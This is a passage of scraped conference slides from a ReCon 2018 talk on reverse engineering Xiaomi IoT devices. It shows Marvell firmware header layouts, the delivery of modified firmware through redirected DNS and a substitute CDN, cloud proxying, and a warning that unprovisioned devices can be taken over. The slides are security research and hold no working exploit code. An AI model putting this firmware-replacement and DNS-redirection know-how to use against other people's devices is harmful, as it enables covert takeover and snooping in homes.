0x00000028 02 00 00 00 18 37 00 00 28 15 08 00 18 37 00 1F 0A 11 25 85
0x3718 0x81528 0x1f003718
segment magic offset in file size of segment mem addr checksum
0x0000003C 02 00 00 00 40 4C 08 00 54 19 00 00 40 00 00 20 FB 5F ED 39
0x84c40 0x1954 0x20000040
![Page 119: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/119.jpg)
119ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Preparing the modified binary (Marvell)
• Preliminary approach for lightbulbs SPI done by Uri Shaked*
• But SPI format != OTA format
• Dennis wrote a script for that + Mediatek OTA format ☺ * h
ttp
s://
ha
cker
no
on
.co
m/i
nsi
de-
the-
bu
lb-a
dve
ntu
res-
in-
reve
rse-
eng
inee
rin
g-s
ma
rt-b
ulb
-fir
mw
are
-1b
81
ce2
69
4a
6
Byte 0-3 4-7 8-11 12-15 16-19
Magic Magic Timestamp # of segments entry address
0x00000000 4D 52 56 4C 7B F1 9C 2E FF BE A8 59 03 00 00 00 19 37 00 1F
"MRVL" 0x1f003719
segment magic offset in file size of segment mem addr checksum
0x00000014 02 00 00 00 C8 00 00 00 50 36 00 00 00 00 10 00 20 C8 51 7D
0xc8 0x3650 0x100000
segment magic offset in file size of segment mem addr checksum
0x00000028 02 00 00 00 18 37 00 00 28 15 08 00 18 37 00 1F 0A 11 25 85
0x3718 0x81528 0x1f003718
segment magic offset in file size of segment mem addr checksum
0x0000003C 02 00 00 00 40 4C 08 00 54 19 00 00 40 00 00 20 FB 5F ED 39
0x84c40 0x1954 0x20000040
![Page 120: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/120.jpg)
120ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
![Page 121: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/121.jpg)
121ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
![Page 122: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/122.jpg)
122ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
![Page 123: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/123.jpg)
123ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
Xiaomi CDN
![Page 124: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/124.jpg)
124ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
Xiaomi CDN
![Page 125: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/125.jpg)
125ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
Xiaomi CDN
![Page 126: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/126.jpg)
126ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
Xiaomi CDN
![Page 127: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/127.jpg)
127ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
Xiaomi CDN
DNS
![Page 128: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/128.jpg)
128ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
Xiaomi CDN
DNS
![Page 129: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/129.jpg)
129ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
Xiaomi CDN
„Hillbilly“ CDN
DNS
![Page 130: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/130.jpg)
130ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
Xiaomi CDN
„Hillbilly“ CDN
DNS
![Page 131: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/131.jpg)
131ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Applying the modified firmware
Xiaomi Cloud
Xiaomi CDN
„Hillbilly“ CDN
DNS
![Page 132: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/132.jpg)
132ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Proxy cloud communication
ot.io.mi.com:80(tcp)ott.io.mi.com:8053(udp)
IPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)
Android/iPhone App
DNS Records
130.83.x.x ot.io.mi.com 130.83.x.x ot.io.mi.com
Dustcloud
<-commands,reports->
![Page 133: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/133.jpg)
133ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Proxy cloud communication
ot.io.mi.com:80(tcp)ott.io.mi.com:8053(udp)
IPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)
Android/iPhone App
DNS Records
130.83.x.x ot.io.mi.com 130.83.x.x ot.io.mi.com
Dustcloud
<-commands,reports->
![Page 134: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/134.jpg)
134ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Other Possible Modifications
• Marvell 88MW30x SDK WiFi sample apps
– p2p_demo
– raw_p2p_demo
– wlan_frame_inject_demo
– wlan_sniffer
![Page 135: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/135.jpg)
135ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
One word of warning…
• Never leave your devices unprovisioned
– Someone else can provision it for you
• Install malicious firmware
• Snoop on your apartment
• Be careful with used devices
– e.g. Amazon Marketplace
– Some malicious software may be installed
![Page 136: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/136.jpg)
136ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Acknowledgements & FAQ
• Secure Mobile Networking (SEEMOO) Labs and CROSSING S1
• Prof. Guevara Noubir (CCIS, Northeastern University)
www.dontvacuum.me*Will be updated after the ReCon ;)
![Page 137: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/137.jpg)
137ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Final remarks
• I (Dennis) want to personally thank the “Studienstiftung des deutschen Volkes”(SDV) for their scholarship and support for my graduate study. Without them I probably would not have time to do this research.
• This research was not financed by Xiaomi nor any competitor. The research was founded by my private funds and was done in our free time.
![Page 138: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/138.jpg)
138ReCon BRX 2018 – Dennis Giese, Daniel Wegemer